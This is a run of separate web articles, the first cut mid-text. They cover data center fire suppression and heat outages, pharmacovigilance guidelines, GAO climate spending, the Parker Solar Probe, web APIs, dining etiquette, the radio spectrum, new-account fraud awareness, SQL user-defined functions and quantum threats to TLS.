When a fire suppression system is triggered, it expels air very quickly, and the physics is different. Future Facilities’ software wasn’t designed to model supersonic air flow, but the physics is pretty well understood, so the company approached a third party to simulate the gas flow created by a fast flood of fire suppressing gas. This was used to provide a “black box” model of the faster flow, including the shockwave produced by the flood of gas.
The model produced some interesting predictions. Future Facilities found that fire suppression systems could work just as well if the nozzles were placed further away from IT systems, where they would do no harm to hard drives. It seems that these systems have been designed to old rules, which were created by authorities outside the data center industry and which predate today’s IT systems.
Future Facilities product manager David King reckons the research means that the whole problem can be avoided by simply placing the nozzles further away, according to CFD models of how they work.
The data center industry’s weapon in the war on risk and waste is science. The agenda of the Zettastructure event is online and the presentations will be available.
A version of this story appeared on Green Data Center News | <urn:uuid:3c58eb0f-b926-4fed-b0b7-adc62829514b> | CC-MAIN-2022-40 | https://www.datacenterdynamics.com/en/opinions/fire-suppression-gets-safer/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00515.warc.gz | en | 0.965714 | 802 | 2.609375 | 3 |
With data centers shutting down thanks to extreme temperatures, should we get used to outages?
One of Twitter's main data centers in California was reportedly knocked out of action by extreme heat earlier this month, raising questions about the resilience of tech infrastructure to climate change.
According to internal memos seen by CNN, soaring temperatures in Sacramento led to a shut-down that threatened service to users. Carrie Fernandez, the company's vice president of engineering, warned Twitter engineers that the company was in a “non-redundant state.” If similar outages were to occur at the company's Atlanta and Portland data centers, she wrote, “we may not be able to serve traffic to all Twitter's users.”
The memos say that Twitter has been handling the problem by halting all non-critical updates, such as deployments and releases to mobile platforms, other than those needed to maintain continuity of service or other “urgent operational needs.”
The story supports statements made by whistleblower Peiter Zatko, who recently told the US Congress that Twitter had no plan as to how to recover from simultaneous outages.
Twitter hasn't confirmed the reports. However, if true, it's not the only time this has happened during the recent global heat wave. Earlier this summer, for example, both Google and Oracle were forced to shut down data centers in the UK, causing widespread outages for their clients.
Indeed, according to research from the Uptime Institute, almost half of data center operators have experienced an extreme weather event that has threatened their continuous operation, with nearly one in ten saying service had been disrupted.
And other tech infrastructure has also been affected, with Verizon recently forced to switch to emergency generators and backup batteries at six of its mobile switching centers in order to keep its network running.
Of course, extreme heat is far from the only effect of climate change. High winds, flooding, fire, and sea level rise can all place critical infrastructure under peril.
Firms are reacting in different ways. AT&T, for example, has worked with the US Department of Energy to develop a climate change analysis tool that projects flooding and winds in the Southeastern US over the next 30 years. The data is used to help plan the company's 5G network facilities.
Meanwhile, the National Oceanography Centre is working to determine where climate change is impacting subsea cable resilience and develop strategies to adapt.
Many data center operators are increasing their cooling capacity, with others shifting their facilities to northern climates or even underwater. However, this can't be a universal solution. In many regions of the world – large parts of Africa, for example – temperatures are consistently high, and large volumes of water are unavailable.
There are mitigations: passive cooling, for example, which ensures hot and chilled air do not mix, as well as immersive liquid cooling, where servers are held in a rack filled with coolant a thousand times more effective than air.
However, these solutions can only go so far. What seems likely is that infrastructure developers will build in more redundancy – extra back-up data centers and so forth – but only to the degree they see as absolutely necessary.
According to the Uptime Institute survey, more than a third of respondents said that their management has yet to formally assess the vulnerability of data centers to climate change. And as the planet heats up and extreme weather events become more frequent, the industry will remain one step behind. It seems likely that outages, whether at data centers or telecoms infrastructure, will become a far more frequent occurrence in the future.
Good Pharmacovigilance Practices
Good pharmacovigilance practices, also referred to as GVPs, are guidelines for pharmaceutical companies to follow to help prevent harm to humans caused by adverse drug reactions (i.e., ADRs) from approved pharmaceutical drugs. The main objectives and roles of good pharmacovigilance practices are:
- Promote the safe and effective use of pharmaceutical products
- Deliver timely information about the safety of medical products
- Evaluate observational data on pharmaceuticals, including drugs and medical devices, excluding blood components
- Provide guidance on the conduct of pharmacovigilance for specific product types or populations in which medical products are used
The guidance and rules set forth by good pharmacovigilance practices can vary slightly from one country to the next. Most countries have regulatory authorities that oversee compliance with good pharmacovigilance practices.
Let’s jump in and learn:
- What Is Pharmacovigilance?
- The European Medicines Agency and Good Pharmacovigilance Practices
- The Food and Drug Administration and Good Pharmacovigilance Practices
- Health Canada and Good Pharmacovigilance Practices
- Good Pharmacovigilance Practice Compliance
- Broad Benefits from Good Pharmacovigilance Practice
What Is Pharmacovigilance?
Although all medical products undergo rigorous testing for safety and efficacy through clinical trials before they are authorized for use, the testing only involves a relatively small number of selected individuals for a short period of time. Pharmacovigilance provides oversight of medical products over their entire lifecycle once they have been licensed for use. The science and activities that are part of pharmacovigilance help identify and evaluate previously unreported adverse reactions.
Pharmacovigilance includes the science and activities that provide a framework for the detection, assessment, understanding, and prevention of:
- Adverse drug effects
- Counterfeit or substandard medicines
- Interaction between medicines
- Lack of efficacy of medicines
- Medication errors
- Misuse and/or abuse of medicines
Pharmacovigilance also helps to:
- Determine if action is required to improve the safety of a medical product
- Ensure that healthcare professionals and patients have access to accurate information about medical products
- Identify changes in the frequency or severity of known adverse effects
- Uncover previously unknown adverse effects
The roles of pharmacovigilance can be broken down into three categories.
1. Surveillance to support risk management and the assessment of adverse reaction data to identify patterns.
2. Operations that focus on collecting and recording information during preclinical development and early clinical trials, and on gathering real-world evidence of adverse events reported by medical professionals and patients after medical products are authorized for commercial use.
3. Systems that are developed to store and manage data relating to pharmacovigilance compliance at all levels of an organization
The European Medicines Agency and Good Pharmacovigilance Practices
The European Medicines Agency (EMA) released guidelines for good pharmacovigilance practices in 2012. The EMA’s good pharmacovigilance practices are a set of measures drawn up to facilitate the performance of pharmacovigilance in the European Union (EU). The EMA’s good pharmacovigilance practices are divided into 16 modules, each of which covers one major process in pharmacovigilance.
Included in the EMA good pharmacovigilance practices is the establishment of the Pharmacovigilance Risk Assessment Committee (PRAC), which is responsible for assessing all aspects of the risk management of medicinal products. The objective of the PRAC is to ensure that medicines approved for the European Union market are optimally used by maximizing their benefits and minimizing risks.
The Food and Drug Administration and Good Pharmacovigilance Practices
The Food and Drug Administration (FDA) issued its guidance for good pharmacovigilance practices in 2005. These are only guidelines and do not establish legally enforceable responsibilities. Instead, good pharmacovigilance practices guidance describes the FDA’s current thinking on a topic and should be viewed only as recommendations unless specific regulatory or statutory requirements are cited.
The FDA’s good pharmacovigilance practices guidance covers medicinal products, including biological and vaccines as well as over-the-counter (OTC) drugs and medical devices. The objective is to ensure that these medical products are safe and effective for human use.
The laws governing this area are the Federal Food, Drug and Cosmetic Act (FDCA) and the FDA Code of Federal Regulations (CFR) Title 21. These outline the requirements for drugs and medical devices for human use and provide the legislative framework and requirements that are implemented at a federal level.
Health Canada and Good Pharmacovigilance Practices
In 2004, Health Canada implemented an inspection program for good pharmacovigilance practices. The program is meant to verify that Market Authorization Holders (MAH) and importers meet the requirements of sections of Canadian Food and Drug Regulations. It also is meant to ensure proper tracking of adverse drug reactions and other post-approval reporting requirements.
The following medical products marketed in Canada for human use are subject to good pharmacovigilance practice compliance inspections:
- Biologics, including biotechnology products, vaccines, and fractionated blood products
- Medical gases
Excluded from good pharmacovigilance practice compliance inspections in Canada are:
- Hard surface disinfectants
- Natural health products
- Veterinary products
- Whole blood and blood components
Good Pharmacovigilance Practice Compliance
The main objectives that good pharmacovigilance practice compliance ensure are the safe and effective use of pharmaceutical products by continuously monitoring, collecting, and providing patients, healthcare professionals, and the general public with timely information about the safety of medical products. Regulatory agencies, such as the FDA, Health Canada, EMA, and the UK’s Medicines and Healthcare products Regulatory Agency (MHRA), can conduct a good pharmacovigilance practice compliance audit at any time in a product’s life cycle (i.e., during a clinical trial, during the regulatory review/approval process, or after a product is on the market).
To be prepared for all aspects of a good pharmacovigilance practice compliance audit, organizations need to regularly review their pre-marketing and post-marketing safety monitoring practices to ensure they are in compliance.
To prepare for a good pharmacovigilance practice compliance audit, organizations should have a strong methodology and processes to gather and organize the key requirements of all the applicable regulatory bodies. This should include strategy, infrastructure, tools, execution, and evaluation details.
Inspectors will review records and procedures to assess compliance, including processes for receiving, analyzing, submitting, and maintaining records about adverse drug reactions, unusual failures in the effectiveness of new drugs, and the preparation of annual summary reports and issue-related summary reports. Management and reporting of ADRs include:
- Quality planning
- Establishment of structures and planning that are integrated with consistent processes (e.g., clear written standard operating procedures)
- Quality control
- Verification at every stage of case documentation, including data collection and data management (e.g., correct data entry and coding); ensuring that minimum requirements are met for case validation and that the compliance, quality, and integrity of data are maintained (e.g., source data have to be recorded and stored)
- Quality assurance
- Monitor and evaluate the programs that have been established and how effectively the processes are being carried out (i.e., using audit systems)
- Quality improvement
- Corrections and improvements to the structures and processes that require updates and/or enhancements
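As an illustration of the case-validation step above: GVP guidance defines four minimum criteria for a valid individual case safety report — an identifiable reporter, an identifiable patient, a suspect product, and an adverse reaction. A minimal sketch of such a check (the field names and case data are our own, not from any regulation) might look like:

```python
REQUIRED = ("reporter", "patient", "suspect_product", "adverse_reaction")

def is_valid_icsr(case: dict) -> bool:
    """A case is processable only if all four minimum criteria are present."""
    return all(case.get(field) for field in REQUIRED)

def missing_criteria(case: dict) -> list:
    """List which minimum criteria still need follow-up."""
    return [field for field in REQUIRED if not case.get(field)]

case = {
    "reporter": "Dr. A. Physician",
    "patient": "male, 54",
    "suspect_product": "Drug X 20 mg",
    "adverse_reaction": "",          # reaction not yet reported
}
print(is_valid_icsr(case))       # False
print(missing_criteria(case))    # ['adverse_reaction']
```

In a real pharmacovigilance system this check would be one gate in a larger workflow — incomplete cases trigger follow-up with the reporter rather than being discarded.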
A good pharmacovigilance practice compliant rating means that an organization complies with good pharmacovigilance practice regulations. Note that an organization may receive a compliant rating even if a number of areas of non-compliance have been identified. This is because the good pharmacovigilance practice compliance rating also considers the level of risk.
In these cases, the organizations would be required to take corrective actions. A good pharmacovigilance practice non-compliant rating could mean either that the establishment has not shown that its activities comply with regulations, or that safety information is missing, which could lead to serious health risks. In either case, non-compliant organizations will need to take immediate corrective actions.
Broad Benefits from Good Pharmacovigilance Practice
Pharmacovigilance is central to drug safety. Good pharmacovigilance practice is predicated on the need for better planning and completing quality controls of pharmacovigilance activities. It provides an agreed-upon framework that helps organizations define better quality-control systems and ensure the safety of medical products in use.
Following good pharmacovigilance practice benefits everyone. Consumers have confidence that medical products are safe and effective. Organizations, which are required to collect and maintain vast amounts of information to meet good pharmacovigilance practice compliance requirements, are able to also use that data for further research and development or for submissions needed for authorities to allow new markets to be accessed.
Egnyte has experts ready to answer your questions. For more than a decade, Egnyte has helped more than 16,000 customers, with millions of users worldwide.
Last Updated: 28th February, 2022 | <urn:uuid:d387f766-1950-48c8-a1de-e3f7eb035422> | CC-MAIN-2022-40 | https://www.egnyte.com/guides/life-sciences/good-pharmacovigilance-practice | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00715.warc.gz | en | 0.925234 | 1,895 | 3.21875 | 3 |
The Government Accountability Office said the U.S. government needs to plan and prepare for extreme weather events caused by climate change in order to significantly reduce its spending on disaster assistance.
In a report released Monday, the agency called for strong leadership and a cohesive, strategic approach to mitigate federal fiscal exposure to climate change.
GAO cited the U.S. Global Change Research Program and the National Academies of Sciences, Engineering and Medicine, which warned that the cost of disaster response and recovery efforts are projected to increase as extreme rainfall or drought become more frequent.
The government watchdog agency proposed establishing a national climate information system, assigning a federal entity to develop and update climate data, and building climate resilience into infrastructure and facility planning.
Lawmakers and federal agencies should review information on the potential economic effects of climate change so they can pinpoint significant risks and formulate better disaster responses, the agency added.
Government spending on disaster assistance amounted to $315 billion between its 2015 and 2021 fiscal years. GAO has petitioned since 2013 to limit federal fiscal exposure through enhanced climate resilience. | <urn:uuid:c55b38d2-5489-4b9d-ab57-2c72cc1a5981> | CC-MAIN-2022-40 | https://executivegov.com/2022/09/gao-federal-preparation-for-climate-hazards-could-reduce-disaster-costs/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00715.warc.gz | en | 0.944677 | 215 | 2.859375 | 3 |
A solar probe Johns Hopkins University Applied Physics Laboratory designed and built for NASA has arrived at Lockheed Martin‘s Astrotech Space Operations facility in Florida to begin pre-launch tests and preparations.
APL said Thursday the Parker Solar Probe is scheduled to lift off July 31 at the Kennedy Space Center to study the sun’s outer atmosphere over a seven-year mission.
The spacecraft, named for astrophysicist Eugene Parker, will work to provide data for researchers to forecast major eruptions on the sun as well as space weather events that may affect ground-based technology, satellites or astronauts in space.
Parker Solar Probe will undergo comprehensive tests, final assembly and mating to a Delta IV Heavy rocket’s third stage at the Astrotech facility.
The launch preparation phase will also involve the installation of a thermal protection system designed to protect the spacecraft from the extremely hot temperature in the sun’s corona. | <urn:uuid:99ff0140-9505-4c14-ad7a-7665941c1817> | CC-MAIN-2022-40 | https://blog.executivebiz.com/2018/04/nasas-solar-probe-to-undergo-final-assembly-tests-at-astrotech-facility-in-florida/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00715.warc.gz | en | 0.908556 | 189 | 2.828125 | 3 |
Published on January 27, 2018. An article that discusses the usability of API calls in information management.
Sun Microsystems, today part of Oracle Inc., surprised the world with TV commercials in the early Nineties claiming that “The Network is the Computer.” No one really understood it at the time. At the time most of us were dealing with client/server computing (a PC program communicating with a database) or with terminal-based host applications. A few bytes were sent back and forth, but depending on the scenario, the intelligence was either with the PC program or the mainframe computer, but certainly not with the network.
Then came the World Wide Web. It brought a uniform way to access information based on Hypertext Transfer Protocol (HTTP). Introduced for human-to-machine communications, HTTP soon paved the road for a concept called the Service Oriented Architecture (SOA) and on its coattails appeared protocols like WebServices and REST that enabled machine-to-machine communications.
SOA and its implementation protocols quickly caught on because, unlike their transaction-monitor predecessors, the protocol standards were open and open-source libraries were freely available. SOA became the best-practice architecture for business systems integration. Even the famously ego-centric Microsoft had to buy into these standards, or it would have lost market momentum for server products like SharePoint. The main driver behind SOA was (and is) modularization and reuse of the enterprise software environment.
From there, it was a small step to a marketing buzzword like “Cloud”. To HTTP, it makes little difference whether the called server (more precisely: its IP address) is on-premises or elsewhere in the world. The rest is history. Be it within a single organization or on the public web, calling different information resources through standardized APIs is the predominant information systems design model of our times. Such concepts come under different names but essentially work the same way: services, mash-ups, portals, microservices, and many more.
What is an API?
The term Application Programming Interface or API is today mostly used in the context of remote calls over the Web (we won’t dive into other meanings in this article). So we focus on the modern remote usage of such an interface and its impact on Records and Information Management (RIM).
An API essentially consists of these three parts:
- Address. Obviously, a request has to go somewhere. In the Web world, the so-called Uniform Resource Identifier (URI) determines where in the Web’s huge address space a service API shall be called.
- Protocol. To read or write data at a certain address, clients and servers need to be able to talk to each other in an ordered way. The sequence of interactions over the network is called the protocol. The ubiquitous protocol for the Web environment is HTTP.
- Document. This is an area of special interest to RIM professionals. Few realize it, but the Web reinvented the significance of the document. It might not correspond with our idea of the well-written official record; rather, it is the currency of the web that is exchanged between parties. It is a snapshot of the server’s data (sometimes called its “state”) that is brought to a certain format and transmitted. This mechanism is referred to as the serialization of the server state. Given a particular request, a client can expect to receive a document that contains the requested information in the requested format. The best-known document format is HTML; however, any format can be exchanged as long as it conforms to a known content type, such as PDF, XML, or TIFF.
To summarize these three terms in one sentence: a client calls an API at a certain address, following a strict communications protocol to interact; eventually, it gets back a response as a document in a format the server can deliver (hopefully the one the client requested). The API is one side of the coin; the flip side is called the implementation. The API is the entry point for client requests and is (or at least should be) independent of the actual implementation.
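The three parts can be sketched with Python's standard library. The endpoint URL below is a hypothetical example, and the server's response is simulated rather than fetched over the network:

```python
import json
from urllib.request import Request

# 1. Address: a URI locating the resource in the Web's address space.
uri = "https://api.example.com/orders/1234"

# 2. Protocol: an HTTP request; the Accept header tells the server which
#    serialization format the client would like back.
req = Request(uri, headers={"Accept": "application/json"}, method="GET")

# 3. Document: the server serializes a snapshot of its state into the
#    requested format and transmits it (simulated here).
server_state = {"order_id": 1234, "status": "shipped"}
document = json.dumps(server_state)

print(req.full_url, req.get_header("Accept"))
print(document)
```

A real client would hand `req` to `urllib.request.urlopen` and read the document from the response body; the API side of the coin stays the same no matter how the server implements it.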
What does an API Driven World Signify for the Information Professional?
Huge amounts of information are crossing organizational boundaries via API calls. As the use of mobile devices and apps swells, the Internet of Things (IoT) grows, and business process integration and digital transformation forge onward, this trend will only accelerate. Other, more traditional means of communication, from physical paper to file transfer in the electronic world, may keep their absolute volume, but the use of APIs will continue to explode.
API endpoints on the server side are gates through which a lot of traffic passes, making them an ideal point to capture data and measure usage of an information asset. Think of an eCommerce site: orders come through the API door, and it is relatively easy to capture all incoming orders and store them as records, or at least tag them for later in-place management. This requires effort on the implementation side, and an important concept here is interception. Interception is often used where the use of data is not directly linked to the core mission of a transaction; log files, for example, are often written via interceptors.
Then there is a set of APIs which is directly geared towards RIM functionality. If, for instance, your system needs to offer functionality to apply and lift legal holds, make that system “API-ready”. It is a future-proof approach to offer such functionality via an API, as opposed to a proprietary client. So eDiscovery systems, for instance, can request holds directly without knowing the intrinsic functionality of your system.
The importance of web-based APIs is paramount today and will only grow in the future. Mobile, IoT, augmented-reality glasses and digital transformation, to name a few, will all communicate via the Internet using APIs. Hence, it is vital for the Information Professional to understand how APIs work.
The incoming data may never get rendered as a traditional record. Records Management, in particular, often still holds to the view that anything important eventually gets printed. With this perspective, you may fail to capture the complete regulatory information, control it with consistent lifecycle management, or satisfy legal production requests.
The next blog will dive into the importance of metadata in this context and how it is best managed.
Eating with groups is one of the most socially significant events that humans partake in, and if you care at all about:
- Not offending people
- Not appearing like a neanderthal
…you may want to review the following.
Some of these primers I make based on my own knowledge. Others I try to learn a little bit from as I assemble them. This is one of the latter.
Here are some of the more important rules for proper eating, broken down into various sections.
- Do not use your mobile device at the table. If you need to look at something, excuse yourself.
- In general, when receiving something like bread, or when pouring wine, offer or pour for others before serving yourself.
- Never chew with your mouth open.
- Do not reach across the table.
- Cut your food one piece at a time.
- Do not speak with food in your mouth.
- Do not pick your teeth at the table.
- Always say ‘excuse me’ when leaving the table for any reason.
- Men always check topcoats. Women have a choice.
- The first arrival always waits for the second before being seated.
- If there are both men and women dining, the women follow the maître d’, host, or hostess, and the men follow them.
- Men wait for the women to sit.
- Silverware is used from outside to in, so if you see four forks on the table, you’re going to potentially have four courses that require them (and they may be of different types).
- Hold your fork in your left hand and your knife in your right, because the active task, cutting, is done with your dominant hand. Even if you’re left-handed, you should eat with the fork in your left hand and the knife in your right.
- When using your knife, extend your index finger down the length of the blade, at least halfway down, and near where you’re cutting. Imagine you’re performing a precise surgery, not like you’re holding the top and sawing.
- The fork is held tines downward. It’s a precise instrument for bringing food to your mouth; not a scooping tool.
- Even if your knife is not needed, it remains on the table.
- When you rest to drink or to engage in conversation, place your knife and fork in an inverted “v”, with your tines facing downward, and your fork and knife crossing in the center. The fork is on top.
- When you finish your plate and are ready for it to be taken away, place your knife and fork parallel at the 4 o’clock position, with the fork in the center and tines down.
- Utensils are usually replaced between courses, even if you’re not moving through the formal groupings already on the table.
- During informal meals, some hold their fork tines upward, American style (yes, that’s bad), but it’s still in the left hand.
- Silverware should never touch the table.
- You pass food to the right.
- As you pass, you hold the dish for the receiver to serve themselves. They should only use the serving utensil provided.
- Heavy or difficult dishes are always put on the table for each pass before serving.
- If you pass something with a handle, the handle goes towards the receiver.
Salt and pepper
- Always taste food before you add salt or pepper.
- Always pass the salt and pepper together, even if only one was asked for.
- If you’re offered a salt cellar instead of a shaker, either use the spoon that’s in it, or the tip of a clean butter knife.
- If the cellar is for just you, you can use your own knife or use your fingers to take a pinch.
- If you’re sharing the cellar, never use your fingers or a dirty knife.
- Salt you’ve taken from the cellar should be put on the bread and butter plate, or the rim of the plate currently in front of you.
- If the bread is placed in front of you, feel free to pick it up and offer it to the person on your right.
- If the loaf is not cut, cut a few pieces and offer them to the person on your left, and then pass it to the right.
- Use the cloth in the bread basket to handle the loaf. Do not touch the bread with your hands.
- Place bread for yourself on your butter plate (which is on your left).
- To eat your bread, break off a bite-sized piece, butter it, and eat it.
- Don’t butter the entire piece and take bites from it.
- Don’t hold your bread in one hand and a drink in another.
- Never take the last piece of bread without asking everyone else if they want it.
- Your water glass is the one above your knife.
- The waiter gets 15% to 20%.
- Especially good service under adverse conditions gets another 10% to 15%.
- Sommeliers get 15% to 20% of the wine bill, assuming they provided actual value.
- Tip discreetly; it’s trashy to be extravagant with it.
- If you’re a regular, consider tipping the host 10% to 20% of the meal every once in a while to say thank you for their services.
- If you’re waiting at a bar for a table, you should tip $1 to $2 per drink.
- If you’re drinking at a bar, tip the same as food (15% to 20%).
- Bathroom attendants should receive $1 to $5, depending on the services provided. Handing you a towel is $1 or $2. If they brush your jacket or provide mints or mouthwash in addition, consider giving up to $5.
- If the attendant has a tray where tips are being accrued, tip there instead of handing it to them.
- Tip musicians using visible receptacles when present, and the amount should be around $1 to $2 per musician. Add a few dollars for special services such as fulfilling requests and/or being especially good or attentive.
- Make sure beforehand that you are to receive the check.
- Place the bill on the edge of the table with the bill and credit card slightly visible.
- The American style resting position is to have the fork, tines upward, at a roughly 4 o’clock position, with the knife at a 1 o’clock tangent position facing inward.
- The American style finished position is identical to the Continental, except the fork’s tines are facing upward.
- I’m using Continental style rules here, which I believe to be the most pure given the history. American rules differ slightly in a few ways you can research on your own.
- There are some who think it ok to eat with your fork in your right hand if you’re left-handed, but my research has indicated this is not true. The fork stays in the left hand.
- I reviewed dozens of resources to make this summary, but http://www.etiquettescholar.com was especially useful.
The radio spectrum refers to electromagnetic waves that are picked up by the antenna. They include the famous FM and AM radio bands, as well as the “short wave” radio picked up by a CB. Here’s a little information about how this spectrum works.
Radio Spectrum Overview
Radio waves are a small slice of the broader electromagnetic (EM) spectrum. The EM spectrum has seven parts, organized by wavelength, frequency, and energy: radio waves, microwaves, infrared, visible light, ultraviolet, X-rays, and gamma rays. Moving down that list, wavelength decreases while frequency and energy increase.
Radio waves, in particular, have the longest wavelengths in this spectrum, ranging from about 1 millimeter to over 62 miles. They also have the lowest frequencies in the EM spectrum, going from roughly 2,000 cycles per second (2 kHz) all the way up to 300 billion hertz (300 GHz).
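The two ranges are linked by wavelength = c / frequency, where c is the speed of light. A quick sanity check in Python (the test frequencies are illustrative values from the text):

```python
C = 299_792_458  # speed of light in m/s

def wavelength_m(frequency_hz: float) -> float:
    """Wavelength in meters for a wave of the given frequency."""
    return C / frequency_hz

print(wavelength_m(300e9))  # ~0.001 m: 1 mm, the short end of the radio band
print(wavelength_m(3e3))    # ~100,000 m: about 62 miles, the long end
print(wavelength_m(100e6))  # ~3 m: a typical FM broadcast wavelength
```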
It’s a big range, but it’s worth noting that since there are so many people transmitting on this range, it quickly gets a lot smaller, especially since there are areas of the range that are more valued than others. Some people compare it to land. Farmers have to find the best land for their purposes, and those who use radio waves have to do this as well.
In the United States, the National Telecommunications and Information Administration manages allocations for different frequencies. The bands have different designations. There’s “Extremely Low Frequency” (ELF), for example, which covers wavelengths above 100 km and frequencies under 3 kHz. Then come very low frequency (VLF), low frequency (LF), medium frequency (MF), high frequency (HF), and so on down the line until you reach extremely high frequency, which covers wavelengths of just 1 millimeter or so.
The VHF, HF and UHF bands tend to be used for FM radio, for the sound on broadcast television, and for things like cellphones and GPS. This is one reason the quality of this type of radio, FM radio specifically, tends to be quite good: the environment doesn’t affect the signal as much, partly because at such high carrier frequencies FM can handle changes in frequency more easily. That is where the name “frequency modulation” comes from.
Shortwave frequencies usually fall in the HF band, ranging from 1.7 megahertz to 30 megahertz (millions of cycles per second). These transmissions can be heard over huge distances, up to thousands of miles, because they can bounce off the ionosphere, an electrically charged layer of the atmosphere. This allows you to talk to just about anyone anywhere through a radio, without necessarily needing a phone or other means of communication.
Overall, there are many communication applications for radio waves, all depending on their exact characteristics.
Fraudsters constantly find ways to overcome security measures taken by companies. Among the most targeted are financial institutions.
Detecting fraud can be hard, especially if you are not aware of them. The best protection is to strengthen security through authentication. Aside from traditional verification processes, adding passwordless authentication can help.
New Account Fraud (NAF)
One type of fraud that you should be aware of is New Account Fraud (NAF). It targets different payment accounts through mobile and/or digital channels, including debit and credit cards, demand deposit accounts (DDAs), online merchant accounts, and card-not-present (CNP) accounts.
Fraudulent activities have increased through the years. In 2018, new accounts with credit card fraud were up 4%. New fraudulent mobile accounts increased by 28%. New fraudulent bank accounts had a 12% rise.
Use of Identity
There are two ways of using identity for NAF attacks. First, the fraudsters steal legitimate identities. Second, they create synthetic identities.
What is the difference?
Legitimate identities are built from data sourced through data breaches, phishing, and/or hacking. This data is used to open accounts in the victim’s name: the fraudsters pretend to be the person whose identity they have stolen. They often do this to bypass authentication, intercept communications from financial institutions, or conduct deposits and withdrawals that establish a pattern convincing the financial institution that they are the owners of the account.
After gaining the trust of the financial institution, they will conduct other activities. They may apply for loans, request credit limit increases, make purchases, withdraw funds, transfer money, or generate fraudulent checks. All of these will be done without the knowledge of the legitimate account holder.
Meanwhile, synthetic identity is a made-up identity. Fraudsters can fabricate an identity using completely fictitious information. They can opt to manipulate an identity using modified real personally identifiable information (PII). Another way is identity compilation, wherein fraudsters combine real and fabricated PII.
The synthetic identity will be used to build credit. They will apply for a bank account or credit card. This way, they can bypass the identification and verification process. They will create a username and password for online transactions. Then, they can start committing payment fraud.
While fraudsters use technology to conduct NAF attacks, financial institutions can also use it to their advantage. Improve cybersecurity to avoid becoming a victim of fraud. One effective step is adding multiple layers of security, which makes accounts more difficult for fraudsters to bypass. Combine different technologies, such as passwordless authentication, biometric authentication, and even OTP.
What are User Defined Functions (UDFs)?
A User Defined Function (UDF) is a function that performs a specific task within a larger system. Often used in SQL databases, UDFs provide a mechanism for extending the functionality of the database server by adding a function that can be evaluated in SQL statements.
Why use User Defined Functions (UDFs)?
UDFs allow you to go beyond what you can do with SQL alone.
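As a minimal illustration (using SQLite's standard Python driver, not any particular vendor's UDF framework), an ordinary Python function can be registered as a UDF and then evaluated inside SQL statements:

```python
import sqlite3

def domain_of(email: str) -> str:
    """Extract the domain part of an e-mail address -- logic that plain
    SQL string functions would make awkward to express."""
    return email.split("@")[-1].lower()

conn = sqlite3.connect(":memory:")
conn.create_function("domain_of", 1, domain_of)  # name, arg count, callable

conn.execute("CREATE TABLE users (email TEXT)")
conn.executemany("INSERT INTO users VALUES (?)",
                 [("alice@Example.com",), ("bob@test.org",)])

rows = conn.execute("SELECT domain_of(email) FROM users").fetchall()
print(rows)  # [('example.com',), ('test.org',)]
```

The same pattern, custom logic callable from SQL, is what commercial databases offer at much larger scale.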
Latest User Defined Functions Insights
If unstructured data is forced into a structure, it is likely to lose some of the meaning and value behind it. Learn how to cope with unstructured data by using User Defined Functions.
Want to dive deep into tech topics as automatic vs. manual software testing, Virtual Schemas, or would just like to get some compelling tech book recommendations? Look no further.
Mining natural language for business insight might involve some difficulties; however, detecting happy customers, angry customers or potential sales opportunities is a real reward.
Interested in learning more?
Whether you’re looking for more information about our fast, in-memory database or want to explore our latest insights, case studies, videos and blogs, we can help guide you into the future of data.
We’ve all seen the scary stories about how quantum computing will break the secure communications that we take for granted today – but no one can say for sure when, or even if, this will happen. So, should you be worried?
The main threat from quantum computing to data security is that it will break the Diffie-Hellman protocol and thus Transport Layer Security (TLS), which is almost universally used to protect the confidentiality and integrity of data in motion over untrusted networks. (We’ll leave aside blockchains and Web 3.0, as that’s another topic in its own right.)
Quantifying the Risk
Given the significant technical barriers still to be overcome at the very forefront of quantum physics, it looks unlikely that quantum computing will advance to the point where it is a threat to classical cryptography within the next few years; and we will probably get plenty of warning as the necessary scientific breakthroughs gradually bring the possibility within reach.
Nonetheless, organizations should certainly be aware of the quantum computing threat and attempt to quantify the potential risk, bearing in mind that TLS sessions could be captured by an adversary today and then decrypted in the future once they have access to viable quantum computing resources. The following factors should be considered:
- How much of my data is at risk? (which data has the potential to be captured by an adversary)
- How sensitive is that data? (what is the value of the data and the impact if it fell into the wrong hands)
- What is the “lifetime” of my data? (will it still be sensitive when quantum computers are available? This could be in as little as 5-10 years in the worst case, though it could be much longer – no one really knows)
- Where is the threat coming from? (given my company’s business and the nature of the data, who would potentially want to capture it, and what might they do with it?)
- What opportunity do they have to capture the data? (could they gain access to the networks carrying the data?)
- When will they have quantum computing capabilities? (state actors are likely to have access to viable quantum computing resources before organized criminals, who in turn will have access before lone hackers)
For the vast majority of organizations, the risk is likely to be very small today and will only impact particularly sensitive data with a long lifetime. But this risk will change over time, so it should be re-evaluated periodically.
Mitigating the Risk
If you have sensitive data with a very long lifetime today, then you should note the risk of using TLS if there is a possibility of interception. Depending on the capabilities of your adversary, this could mean using more secure networks and/or using different protocols (e.g. IPSec with pre-shared key). Note that the current candidate post-quantum algorithms are still largely unproven and should not be relied upon today.
For everything else, you should start looking at your infrastructure and make sure all relevant communication endpoints are capable of being upgraded to use post-quantum algorithms within a reasonable timeframe (e.g., 3 to 5 years). Avoid buying new solutions that are not upgradeable. Also, be aware of the likely performance hit of using these algorithms.
However, it will likely be another few years before post-quantum algorithms have been standardized and are suitable for production use. Even then, these new algorithms will remain somewhat unproven, and as such it will probably be necessary to use hybrid protocols combining both classical and post-quantum algorithms for a time.
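The hybrid idea can be sketched in a few lines: derive the session key from both a classical shared secret (say, from ECDH) and a post-quantum one (from a KEM), so the session remains secure as long as either algorithm holds. The two input secrets below are placeholders, and the derivation is a simplified HKDF-style construction, not a production protocol:

```python
import hashlib
import hmac

classical_secret = b"\x01" * 32     # stand-in for an ECDH shared secret
post_quantum_secret = b"\x02" * 32  # stand-in for a PQC KEM shared secret

def hybrid_key(s1: bytes, s2: bytes, info: bytes = b"hybrid-session") -> bytes:
    # HKDF-style extract-then-expand over the concatenated secrets: an
    # attacker must know BOTH inputs to reproduce the session key.
    prk = hmac.new(b"\x00" * 32, s1 + s2, hashlib.sha256).digest()
    return hmac.new(prk, info + b"\x01", hashlib.sha256).digest()

session_key = hybrid_key(classical_secret, post_quantum_secret)
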